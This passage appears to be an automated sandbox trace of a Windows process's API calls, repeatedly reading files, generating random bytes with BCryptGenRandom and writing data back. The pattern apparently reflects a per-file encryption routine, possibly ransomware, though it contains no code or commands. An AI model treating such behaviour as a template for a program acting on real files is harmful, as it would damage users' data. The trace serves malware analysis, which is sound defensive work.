(in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0124.278] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x4dd3, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0124.279] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0124.280] CloseHandle (hObject=0x308) returned 1 [0124.280] free (_Block=0x3df0008) [0124.280] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0124.337] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.337] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.337] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0124.337] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.338] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0124.338] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0124.338] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0124.338] free (_Block=0x3e305b8) [0124.338] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0124.338] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0124.338] free (_Block=0x1fa91d0) [0124.338] free (_Block=0x77d7a8) [0124.339] free (_Block=0x1fa90b8) [0124.339] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0124.339] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0124.370] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3810, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0124.371] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0124.372] CloseHandle (hObject=0x308) returned 1 [0124.372] free (_Block=0x3df0008) [0124.373] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0124.418] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.420] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.426] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0124.426] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.427] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0124.427] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0124.427] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0124.427] free (_Block=0x3e305b8) [0124.428] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0124.428] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0124.428] free (_Block=0x1fa91d0) [0124.428] free (_Block=0x77d7a8) [0124.428] free (_Block=0x1fa90b8) [0124.428] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0124.428] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0124.430] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2aa0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0124.430] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0124.452] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x148b, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0124.453] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0124.453] CloseHandle (hObject=0x308) returned 1 [0124.453] free (_Block=0x3df0008) [0124.454] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0124.462] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.466] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0124.466] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.466] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.466] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0124.467] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0124.467] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0124.467] free (_Block=0x3e305b8) [0124.467] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0124.467] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0124.467] free (_Block=0x1fa91d0) [0124.467] free (_Block=0x77d7a8) [0124.467] free (_Block=0x1fa90b8) [0124.467] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0124.467] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0124.573] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x84c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0124.574] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0124.575] CloseHandle (hObject=0x308) returned 1 [0124.575] free (_Block=0x3df0008) [0124.575] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0124.583] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.584] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.584] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0124.584] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.585] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.585] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0124.585] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0124.585] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0124.585] free (_Block=0x3e305b8) [0124.585] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0124.585] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0124.586] free (_Block=0x1fa91d0) [0124.586] free (_Block=0x77d7a8) [0124.586] free (_Block=0x1fa90b8) [0124.586] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0124.586] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0124.587] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x40a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0124.587] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0124.599] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xc8c9, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0124.601] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0124.616] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1367, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0124.616] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0124.617] CloseHandle (hObject=0x308) returned 1 [0124.617] free (_Block=0x3df0008) [0124.617] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0124.963] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.970] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.977] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0124.977] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.980] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.980] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0124.981] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0124.981] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0124.981] free (_Block=0x3e305b8) [0124.981] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0124.981] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0124.981] free (_Block=0x1fa91d0) [0124.981] free (_Block=0x77d7a8) [0124.981] free (_Block=0x1fa90b8) [0124.981] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0124.982] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0124.982] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xf40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0124.982] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0125.008] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x45be, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0125.010] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0125.010] CloseHandle (hObject=0x308) returned 1 [0125.010] free (_Block=0x3df0008) [0125.010] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0125.021] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0125.022] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0125.022] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0125.022] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0125.022] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0125.022] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0125.023] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0125.023] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0125.023] free (_Block=0x3e305b8) [0125.023] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0125.023] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0125.023] free (_Block=0x1fa91d0) [0125.023] free (_Block=0x77d7a8) [0125.023] free (_Block=0x1fa90b8) [0125.023] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0125.024] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0125.025] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x45c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0125.026] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0125.026] CloseHandle (hObject=0x308) returned 1 [0125.027] free (_Block=0x3df0008) [0125.027] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0125.038] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0125.039] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0125.039] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0125.039] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0125.039] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0125.039] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0125.039] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0125.039] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0125.039] free (_Block=0x3e305b8) [0125.040] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0125.040] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0125.040] free (_Block=0x1fa91d0) [0125.040] free (_Block=0x77d7a8) [0125.040] free (_Block=0x1fa90b8) [0125.040] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0125.041] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0125.054] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x13400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0125.054] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0125.055] CloseHandle (hObject=0x308) returned 1 [0125.056] free (_Block=0x3df0008) [0125.056] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0125.089] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0125.090] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0125.090] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0125.090] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0125.091] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0125.091] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0125.091] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0125.091] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0125.091] free (_Block=0x3e305b8) [0125.091] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0125.091] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0125.092] free (_Block=0x1fa91d0) [0125.092] free (_Block=0x77d7a8) [0125.092] free (_Block=0x1fa90b8) [0125.092] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0125.092] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0125.097] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0125.097] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0125.098] CloseHandle (hObject=0x308) returned 1 [0125.098] free (_Block=0x3df0008) [0125.098] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0125.106] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0125.107] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0125.107] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0125.107] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0125.107] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0125.107] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0125.107] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0125.107] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0125.108] free (_Block=0x3e305b8) [0125.108] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0125.108] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0125.108] free (_Block=0x1fa91d0) [0125.108] free (_Block=0x77d7a8) [0125.108] free (_Block=0x1fa90b8) [0125.108] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0125.109] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0125.125] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0125.126] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0126.263] CloseHandle (hObject=0x308) returned 1 [0126.269] free (_Block=0x3df0008) [0126.269] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0126.276] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0126.277] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0126.277] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0126.277] LoadLibraryA 